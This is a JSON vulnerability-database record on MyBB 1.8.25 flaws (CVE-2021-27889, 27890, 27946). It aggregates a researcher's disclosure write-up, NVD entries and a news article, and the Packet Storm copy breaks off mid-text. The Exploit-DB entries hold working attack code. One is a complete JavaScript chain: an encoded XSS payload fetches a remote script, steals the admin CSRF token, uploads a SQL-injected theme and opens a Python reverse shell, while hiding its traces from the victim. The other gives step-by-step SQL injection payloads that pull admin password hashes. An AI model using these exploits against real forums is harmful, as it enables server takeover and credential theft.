rel=\"noopener\" class=\"mycode_url\">\n```\n\nAs you can see, an <a> tag has been inserted into the existing <img> tag. Since both of these tags contain double quotes, they corrupt each other. Browsers such as Chrome or FireFox are going to construct a final <img> element containing an attacker controlled onerror event handler. This allows the attacker to execute arbitrary JavaScript code in the browser of a victim who reads the malicious post or private message.\n\n### SQL Injection in Theme Properties leading to RCE\n\nThe XSS vulnerability described in the previous section enables an attacker to target administrators of a MyBB forum. If the attacker succeeds in injecting malicious JavaScript code into the browser of an administrative user with an active session, he can perform arbitrary actions with admin privileges. MyBB actively prevents even administrator users from executing arbitrary PHP code on the underlying server, thus we will present an authenticated RCE vulnerability that can be reached with administrative privileges.\n\nOne of the features MyBB admins can access, is the theme manager of a MyBB forum. A MyBB theme consists of a list of key-value pairs. The key is a component of the current page, for example a welcome back message that should be displayed.\n\nHere is an example of how MyBB then displays such a component:\n\n```\neval('$modcplink = \"'.$templates->get('header_welcomeblock_member_moderator').'\";');\n```\n\nIn above's example, the theme key header_welcomeblock_member_moderator is requested. The value of this theme component could then look like the following:\n\n```\n<div id='welcomeblock_back'><b>{$mybb->user['username']}</b></div>\n```\n\nThis means that the final string that is passed to eval() would look like this:\n\n```\n$modcplink = \"<div id='welcomeblock_back'><b>{$mybb->user['username']}</b></div>\";\n```\n\nAs you can see, the contents are enclosed in double quotes and the PHP variable {$mybb->user['username']} is interpolated into the string. The reason that this feature does not enable remote code execution (RCE) immediately is that MyBB escapes double quotes in template values when they are stored into the database. Thus, it is impossible to break out of the double quoted string. Another PHP trick exists, that could have resulted in RCE, which is that an attacker could have modified the template and added a $ to the variable that becomes string interpolated, like the following:\n\n```\n$modcplink = \"<div id='welcomeblock_back'><b>${arbitrary_function()}</b></div>\";\n```\n\nHowever, MyBB also prevents this unique PHP quirk by preventing administrators from inserting such interpolations. This meant that if we could find a bypass for MyBB\u2019s filter, we could still execute arbitrary PHP code. We achieved this bypass through an SQL injection.\n\nMyBB themes can be imported through XML files which contain a set of theme properties such as the image directory or the version. Additionally, a list of key value pairs is read where the name correlates to the key of the theme component and the value to the contents. Here is an example:\n\n```\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<theme name=\"Theme Example\" version=\"1405\">\n <properties>\n <templateset><![CDATA[10]]></templateset>\n <imgdir><![CDATA[images/]]></imgdir>\n <logo><![CDATA[images/logo.png]]></logo>\n </properties>\n <stylesheets></stylesheets>\n <templates>\n <template name=\"header_welcomeblock_member_moderator\" version=\"1404\"><![CDATA[\n <div id='welcomeblock_back'><b>{$mybb->user['username']}</b></div>\n ]]></template>\n </templates>\n</theme>\n```\n\nWhenever an administrator imports such a theme, the XML is parsed and the properties of the theme are stored into the database. As it turned out, the templateset property was susceptible to a second order SQL injection. \n\nWhen these themes are uploaded they are inserted into the database of the MyBB instance and are later used in other SQL queries without any sanitization.\n\nWe already touched on how the values of MyBB template components are passed to eval() calls, thus leading to arbitrary PHP code execution should an attacker be able to control the value of a theme property. The following paragraphs describe an SQL injection, which enables an attacker to inject malicious template codes into eval() calls.\n\nAt the beginning of each page load, MyBB fetches all possible template values from the database and stores them in a cache. The SQL query that fetches all template values, uses the templateset property, which is embedded unsanitized into the query string. Therefore an SQL injection vulnerability occurs:\n\n```\n$query = $db->simple_select(\"templates\", \"title,template\",\n \"title IN (''$sql) AND sid IN ('-2','-1','\".$theme['templateset'].\"')\",\n array('order_by' => 'sid', 'order_dir' => 'asc')\n```\n\nAs shown, the query simply interposes the templateset attribute. With a malicious theme, one can control this attribute and let this cache function return attacker controlled values. Here is an example of such a crafted theme with a SQL injection payload:\n\n```\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<theme name=\"Default\" version=\"1821\">\n <properties>\n <templateset>') AND 1=0 UNION SELECT title, '${passthru(\\'ls\\')}' from mybb_templates -- </templateset>\n </properties>\n</theme>\n```\n\nThe resulting SQL query looks like the following:\n\n```\nSELECT title, template FROM mybb_templates WHERE \n title IN (\u2018header_welcomeblock_member_moderator\u2019, \u2018...\u2019) AND SID IN (\u2018-2\u2019, \u2018-1\u2019, \u2018\u2019) \n AND 1=0 UNION SELECT title, '${passthru(\\'ls\\')}' from mybb_templates -- \u2019)\n```\n\nThrough this SQL injection, it is possible to poison the template cache with attacker controlled values, which do not undergo any escaping or sanitization. As these template values that are now completely attacker controlled are passed to eval inside the double quoted string we can execute arbitrary PHP code within the ${...} syntax. As a result, an attacker can execute arbitrary PHP code and compromise the underlying server.\n\n## Timeline\n\n| Date | Event |\n| ---------- | --------------------------------------------------- |\n| 22.02.2021 | Both vulnerabilities were reported to the MyBB team |\n| 22.02.2021 | The MyBB team acknowledges both vulnerabilities |\n| 04.03.2021 | The MyBB team proposes patches |\n| 05.03.2021 | We confirm the patches |\n| 10.03.2021 | MyBB releases patch version 1.8.26 |\n\n## Summary\n\nMulti-step parsers and HTML renderers can always run into the risk of corrupting their own output, sometimes with security implications. We disclosed similar vulnerabilities in the past to [WordPress](https://blog.ripstech.com/2019/wordpress-csrf-to-rce/) and [Magento](https://blog.ripstech.com/2019/magento-rce-via-xss/). It is advisable to not let regexes grow too complex in these parsers, especially when they are meant to prevent security issues. We hope that the SonarSource community can learn from these mistakes to develop secure code and we enjoyed sharing our findings as a guest blog post at SonarSource. Last but not least, we would like to thank the MyBB team for their great cooperation on resolving these issues very quickly.", "published": "2021-03-19T00:00:00", "type": "seebug", "title": "MyBB \u672a\u6388\u6743RCE\u6f0f\u6d1e\uff08CVE-2021-27889 CVE-2021-27890\uff09", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-27889", "CVE-2021-27890"], "modified": "2021-03-19T00:00:00", "id": "SSV:99162", "href": "https://www.seebug.org/vuldb/ssvid-99162", "sourceData": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2022-01-13T05:29:29", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-22T00:00:00", "type": "exploitdb", "title": "MyBB 1.8.25 - Chained Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889", "CVE-2021-27890", "2021-27890", "2021-27889"], "modified": "2021-03-22T00:00:00", "id": "EDB-ID:49696", "href": "https://www.exploit-db.com/exploits/49696", "sourceData": "# Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution\r\n# Exploit Author: SivertPL (kroppoloe@protonmail.ch)\r\n# Date: 19.03.2021\r\n# Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval().\r\n# Software Link: https://resources.mybb.com/downloads/mybb_1825.zip\r\n# CVE: CVE-2021-27889, CVE-2021-27890\r\n\r\n# Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums \r\n# The exploit requires the target administrator to have a valid ACP session.\r\n# Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ\r\n# Guide:\r\n\r\n1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it. \r\n\r\nPlease replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target.\r\n\r\n document.write('<script src=http://localhost:8000/second_stage.js></script>');\r\n\r\n2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment.\r\n\r\nYou can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/\r\n\r\n3) Put the resulting encoded payload in the nested autourl vulnerability vector:\r\n\r\n [img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]\r\n\r\n4) The final payload should look like this:\r\n\r\n [img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]\r\n\r\n5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported.\r\nOnce the target's browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to 'bypass' SOP.\r\n\r\nAfter the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.\r\n\r\n6) Enjoy your RCE! For educational purposes only. \r\n\r\n\r\nconst REVERSE_SHELL_IP = \"localhost\";\r\nconst REVERSE_SHELL_PORT = 5554;\r\n\r\nconst PAYLOAD_XML_NAME = \"payload\";\r\nconst PAYLOAD_XML_VERSION = \"1821\";\r\n\r\nconst XML_PROLOG = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\";\r\n\r\nconst SHELL_PAYLOAD = \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\" + REVERSE_SHELL_IP + \"\\\",\" + REVERSE_SHELL_PORT + \"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\nconst SQL_PAYLOAD = \"') AND 1=0 UNION SELECT title, '${passthru(base64_decode(\\\\'\" + btoa(SHELL_PAYLOAD) + \"\\\\'))}' from mybb_templates -- \";\r\n\r\n\r\n// Trigger the actual vulnerability, force cache reload.\r\n// Stage: Final\r\nfunction trigger() {\r\n var request = new XMLHttpRequest();\r\n\r\n request.open('GET', '/index.php');\r\n request.send();\r\n}\r\n\r\n\r\n// Poison the cache.\r\n// Stage: 6\r\nfunction set_as_default(token, tid) {\r\n\r\n var request = new XMLHttpRequest();\r\n\r\n request.open('GET', '/admin/index.php?module=style-themes&action=set_default&tid=' + tid + '&my_post_key=' + token);\r\n\r\n request.onload = function() { trigger(); };\r\n\r\n request.send();\r\n}\r\n\r\n// Get the TID of the downloaded theme payload\r\n// Stage: 5\r\nfunction get_payload_tid(token) {\r\n var request = new XMLHttpRequest();\r\n\r\n request.open('GET', '/admin/index.php?module=style-themes');\r\n\r\n request.responseType = \"document\";\r\n\r\n request.onload = function() { \r\n \r\n var response = request.response;\r\n\r\n var aTags = response.getElementsByTagName(\"a\");\r\n var searchText = \"payload\";\r\n var found;\r\n\r\n for (var i = 0; i < aTags.length; i++) {\r\n if (aTags[i].textContent == searchText) {\r\n found = aTags[i];\r\n break;\r\n }\r\n }\r\n\r\n var href = found.getAttribute(\"href\");\r\n\r\n var urlParams = new URLSearchParams(href);\r\n\r\n var tid = urlParams.get(\"tid\");\r\n \r\n\r\n set_as_default(token, tid); \r\n };\r\n\r\n request.send();\r\n\r\n}\r\n\r\n\r\n// We pass the actual request to upload the template exploiting the second link of the exploit chain\r\n// Stage: 4\r\nfunction upload_template(token) {\r\n\r\n var request = new XMLHttpRequest();\r\n\r\n request.open('POST', '/admin/index.php?module=style-themes&action=import');\r\n\r\n var data = new FormData();\r\n\r\n data.append('my_post_key', token);\r\n data.append('local_file', build_payload(), PAYLOAD_XML_NAME + \".xml\");\r\n data.append('import', 0);\r\n data.append('url', '');\r\n data.append('tid', '1');\r\n data.append('name', \"payload\");\r\n data.append(\"version_compat\", 1);\r\n data.append(\"import_stylesheets\", 1);\r\n data.append(\"import_templates\", 1);\r\n\r\n request.onload = function() { \r\n // After uploading the template, set it as default to poison the cache\r\n get_payload_tid(token)\r\n };\r\n\r\n\r\n request.send(data);\r\n}\r\n\r\n\r\n// Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation.\r\n// Stage: 3\r\nfunction build_payload() {\r\n var xmlDom = document.implementation.createDocument(\"\", \"\", null);\r\n \r\n var theme = xmlDom.createElement(\"theme\");\r\n theme.setAttribute(\"name\", PAYLOAD_XML_NAME);\r\n theme.setAttribute(\"version\", PAYLOAD_XML_VERSION);\r\n\r\n var properties = xmlDom.createElement(\"properties\");\r\n theme.appendChild(properties);\r\n\r\n var template_set = xmlDom.createElement(\"templateset\");\r\n template_set.innerHTML = SQL_PAYLOAD;\r\n properties.appendChild(template_set);\r\n\r\n xmlDom.appendChild(theme);\r\n\r\n var serialized = new XMLSerializer().serializeToString(xmlDom);\r\n\r\n var result = XML_PROLOG + serialized;\r\n var file = new File([result], PAYLOAD_XML_NAME);\r\n \r\n return file;\r\n}\r\n\r\n\r\n// Acquire the anti-CSRF token \r\n// Stage: 2\r\nfunction acquire_token(request) {\r\n\r\n var response = request.response;\r\n var token = response.getElementsByName(\"my_post_key\")[0].value;\r\n\r\n if(token == null) { \r\n /* ACP Session either expired or wasn't established to begin with */\r\n return;\r\n }\r\n\r\n // We have acquired the anti-CSRF token now.\r\n upload_template(token);\r\n}\r\n\r\n\r\n// ACP Code Execution\r\n// Stage: 1\r\nfunction exec_acp() {\r\n \r\n var request = new XMLHttpRequest();\r\n\r\n request.open('GET', 'admin/index.php?module=style-themes&action=import');\r\n request.responseType = \"document\";\r\n\r\n request.onload = function() { \r\n acquire_token(request); \r\n };\r\n\r\n request.send();\r\n}\r\n\r\n\r\n// We hide the payload, to raise less suspicions\r\n// Stage: 0\r\nfunction hide() {\r\n\r\n var getAll = document.querySelectorAll(\"[src*='http://xyzsomething.com/image?)<a href=']\");\r\n\r\n getAll.forEach(element => {\r\n var pNode = element.parentNode.innerText=\"lmao whatever you say\";\r\n });\r\n \r\n}\r\n\r\n// Entry point of the exploit\r\nfunction start() {\r\n hide();\r\n exec_acp(); \r\n}\r\n\r\n\r\nstart();", "sourceHref": "https://www.exploit-db.com/download/49696", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-13T17:39:04", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-23T00:00:00", "type": "exploitdb", "title": "MyBB 1.8.25 - Poll Vote Count SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-27946", "CVE-2021-27889", "CVE-2021-27946"], "modified": "2021-03-23T00:00:00", "id": "EDB-ID:49699", "href": "https://www.exploit-db.com/exploits/49699", "sourceData": "# Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection\r\n# Exploit Author: SivertPL (kroppoloe@protonmail.ch)\r\n# Date: 20.03.2021\r\n# Description: Lack of sanitization in the \"votes[]\" parameter in \"Edit Poll\" causes a second-order semi-blind SQL Injection that is triggered when performing a \"Move/Copy\" operation on the thread.\r\n# Sofware Link: https://resources.mybb.com/downloads/mybb_1825.zip\r\n# CVE: CVE-2021-27946\r\n\r\nReferences:\r\n\r\n 1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums \r\n 2) https://vuldb.com/?id.171307\r\n 3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch \r\n\r\nIn order to trigger the vulnerability, you must have permission to edit polls. \r\nModerators and administrators can usually do it, but in some configurations regular users can do it as well.\r\n\r\nIn case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash.\r\n\r\nOtherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary\r\ninjections automatically, and send the resulting hashes to your server.\r\n\r\nThis is a pretty nasty vulnerability to exploit by hand (at least on regular, most common MySQL setup), but can be dangerous in the hands of \r\na very determined attacker who combines it with CVE-2021-27889 and an automated Javascript-Based SQL Injector.\r\n\r\nThis vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used.\r\nIn such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash).\r\n\r\nGuide:\r\n\r\n1) Make a thread with a public poll, with multiple choices.\r\n\r\n2) Vote on at least one choice.\r\n\r\n3) Go to the \"Edit poll\" section of the poll.\r\n\r\n4) Place the following payload in the \"vote count\" input (any entry within the votes[] parameter in the resulting POST request).\r\n\r\n 1','2',ascii((select version())),'0','0','1','1') -- -a\r\n\r\n5) Save the poll.\r\n\r\n6) Perform a \"Move/Copy\" operation on the thread, moving it to a different forum, or making a copy in the same forum.\r\n\r\nThis is where the SQL Injection is triggered, and you should see an SQL Error here if the payload is incorrect.\r\n\r\n7) Go to the copied/moved version of the thread (you should be redirected there automatically).\r\n\r\n8) Go to the \"Show Results\" section of the poll.\r\n\r\n9) The total vote count under the poll is our 64 bit unsigned integer covert channel to retrieve information from the ascii select query. \r\n\r\nSince this vulnerability is semi-blind, you can only retrieve the output of the SELECT query as an unsigned integer (hence we use ASCII()).\r\nOther parameters in the INSERT query that we are injecting into are either too small, or unfeasible. \r\nUnsigned integer provides enough space to extract required data when enough requests are made.\r\n\r\nIn this case, the number is the ASCII code of the first character of the result of the injected select version() query.\r\nThis way we can transfer the output through this covert channel, one character at a time.\r\n\r\nIn order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int.\r\n\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 2, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 3, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 4, 1))),'0','0','1','1') -- -a\r\n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 5, 1))),'0','0','1','1') -- -a\r\n\r\n... etc.\r\n\r\nThis will send the ASCII codes of every char of the hashed password through the integer covert channel.\r\n\r\n\r\n10) After sending enough requests, you should have the hashed admin password. Repeat the entire process to acquire the salt.", "sourceHref": "https://www.exploit-db.com/download/49699", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T16:16:20", "description": "SQL Injection vulnerablity in MyBB before 1.8.26 via theme properties included in theme XML files.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-15T18:15:00", "type": "cve", "title": "CVE-2021-27890", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27890"], "modified": "2021-09-21T17:48:00", "cpe": [], "id": "CVE-2021-27890", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27890", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T16:16:17", "description": "Cross-site Scripting (XSS) vulnerability in MyBB before 1.8.26 via Nested Auto URL when parsing messages.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-03-15T17:15:00", "type": "cve", "title": "CVE-2021-27889", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889"], "modified": "2021-09-21T17:48:00", "cpe": [], "id": "CVE-2021-27889", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27889", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "thn": [{"lastseen": "2022-05-09T12:38:26", "description": "[![](https://thehackernews.com/images/-VYbGanTVJLw/YFNO_wuzwVI/AAAAAAAACDw/sbjkgjkY8R856b9AlWi9YQsis2JTdRM9gCLcBGAsYHQ/s0/mybb.jpg)](<https://thehackernews.com/images/-VYbGanTVJLw/YFNO_wuzwVI/AAAAAAAACDw/sbjkgjkY8R856b9AlWi9YQsis2JTdRM9gCLcBGAsYHQ/s0/mybb.jpg>)\n\nA pair of critical vulnerabilities in a popular bulletin board software called MyBB could have been chained together to achieve remote code execution (RCE) without the need for prior access to a privileged account.\n\nThe flaws, which were discovered by independent security researchers Simon Scannell and Carl Smith, were reported to the MyBB Team on February 22, following which it [released](<https://blog.mybb.com/2021/03/10/mybb-1-8-26-released-security-release/>) an update (version 1.8.26) on March 10 addressing the issues.\n\nMyBB, formerly MyBBoard and originally MyBulletinBoard, is free and open-source forum software developed using PHP and MySQL. According to internet assets search engine Spyse, there are at least [2,100 potentially vulnerable domains](<https://spyse.com/target/technology/MyBB>) that have MyBB installed.\n\nAccording to the researchers, the first issue \u2014 a nested auto URL persistent XSS vulnerability (CVE-2021-27889) \u2014 stems from how MyBB parses messages containing URLs during the rendering process, thus enabling any unprivileged forum user to embed stored XSS payloads into threads, posts, and even private messages.\n\n\"The vulnerability can be exploited with minimal user interaction by saving a maliciously crafted MyCode message on the server (e.g. as a post or Private Message) and pointing a victim to a page where the content is parsed,\" MyBB [said](<https://github.com/mybb/mybb/security/advisories/GHSA-xhj7-3349-mqcm>) in an advisory.\n\nThe second vulnerability concerns an SQL injection ([CVE-2021-27890](<https://github.com/mybb/mybb/security/advisories/GHSA-r34m-ccm8-mfhq>)) in a forum's theme manager that could result in an authenticated RCE. A successful exploitation occurs when a forum administrator with the \"Can manage themes?\" permission imports a maliciously crafted theme, or a user, for whom the theme has been set, visits a forum page. \n\n\"A sophisticated attacker could develop an exploit for the Stored XSS vulnerability and then send a private message to a targeted administrator of a MyBB board,\" the researchers [outlined](<https://blog.sonarsource.com/mybb-remote-code-execution-chain>) in a technical write-up. \"As soon as the administrator opens the private message, on his own trusted forum, the exploit triggers. An RCE vulnerability is automatically exploited in the background and leads to a full takeover of the targeted MyBB forum.\"\n\nBesides the two aforementioned vulnerabilities, version 1.8.26 also resolves four other security shortcomings that were identified by the MyBB Team, including \u2014\n\n * [CVE-2021-27946](<https://github.com/mybb/mybb/security/advisories/GHSA-23m9-w75q-ph4p>) \\- Improper validation of the number of votes in thread poll options, leading to SQL injection\n * [CVE-2021-27947](<https://github.com/mybb/mybb/security/advisories/GHSA-jjx8-8mcp-7h65>) \\- Improper sanitization of certain forum data, causing SQL injection when used in subsequent queries\n * [CVE-2021-27948](<https://github.com/mybb/mybb/security/advisories/GHSA-3p9w-2q65-r6g2>) \\- Additional User Groups ID numbers can be saved without proper validation in the Admin Control Panel, resulting in SQL injection, and\n * [CVE-2021-27949](<https://github.com/mybb/mybb/security/advisories/GHSA-cmmr-39v8-8rx2>) \\- A reflected XSS vulnerability in custom Moderator Tools, when user input attached to CSRF token-protected POST requests is not properly sanitized\n\nMyBB users are advised to upgrade to the [latest version](<https://mybb.com/versions/1.8.26/>) to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-18T16:08:00", "type": "thn", "title": "Critical RCE Flaw Reported in MyBB Forum Software\u2014Patch Your Sites", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27889", "CVE-2021-27890", "CVE-2021-27946", "CVE-2021-27947", "CVE-2021-27948", "CVE-2021-27949"], "modified": "2021-03-22T06:29:16", "id": "THN:3152B45B015211515D21C5C8A05763F5", "href": "https://thehackernews.com/2021/03/critical-rce-flaw-reported-in-mybb.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-03-23T16:46:47", "description": "", "published": "2021-03-23T00:00:00", "type": "packetstorm", "title": "MyBB 1.8.25 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-27889", "CVE-2021-27946"], "modified": "2021-03-23T00:00:00", "id": "PACKETSTORM:161918", "href": "https://packetstormsecurity.com/files/161918/MyBB-1.8.25-SQL-Injection.html", "sourceData": "`# Exploit Title: MyBB 1.8.25 - Poll Vote Count SQL Injection \n# Exploit Author: SivertPL (kroppoloe@protonmail.ch) \n# Date: 20.03.2021 \n# Description: Lack of sanitization in the \"votes[]\" parameter in \"Edit Poll\" causes a second-order semi-blind SQL Injection that is triggered when performing a \"Move/Copy\" operation on the thread. \n# Sofware Link: https://resources.mybb.com/downloads/mybb_1825.zip \n# CVE: CVE-2021-27946 \n \nReferences: \n \n1) https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums \n2) https://vuldb.com/?id.171307 \n3) https://github.com/mybb/mybb/commit/aa415f08bce01f95a8319b707bb18eb67833f4c1.patch \n \nIn order to trigger the vulnerability, you must have permission to edit polls. \nModerators and administrators can usually do it, but in some configurations regular users can do it as well. \n \nIn case you are a moderator, the vulnerability can be used as privilege escalation provided you crack the resulting salted hash. \n \nOtherwise, you are free to use CVE-2021-27889 to impersonate the target moderator to trigger this SQL Injection from an external .js script which will perform the necessary \ninjections automatically, and send the resulting hashes to your server. \n \nThis is a pretty nasty vulnerability to exploit by hand (at least on regular, most common MySQL setup), but can be dangerous in the hands of \na very determined attacker who combines it with CVE-2021-27889 and an automated Javascript-Based SQL Injector. \n \nThis vulnerability might however allow for devastating execution of stacked queries when databases such as PostgreSQL or MS-SQL are used. \nIn such cases, the entire system is compromised as a result (an attacker can UPDATE the admin password and replace it with his own hash). \n \nGuide: \n \n1) Make a thread with a public poll, with multiple choices. \n \n2) Vote on at least one choice. \n \n3) Go to the \"Edit 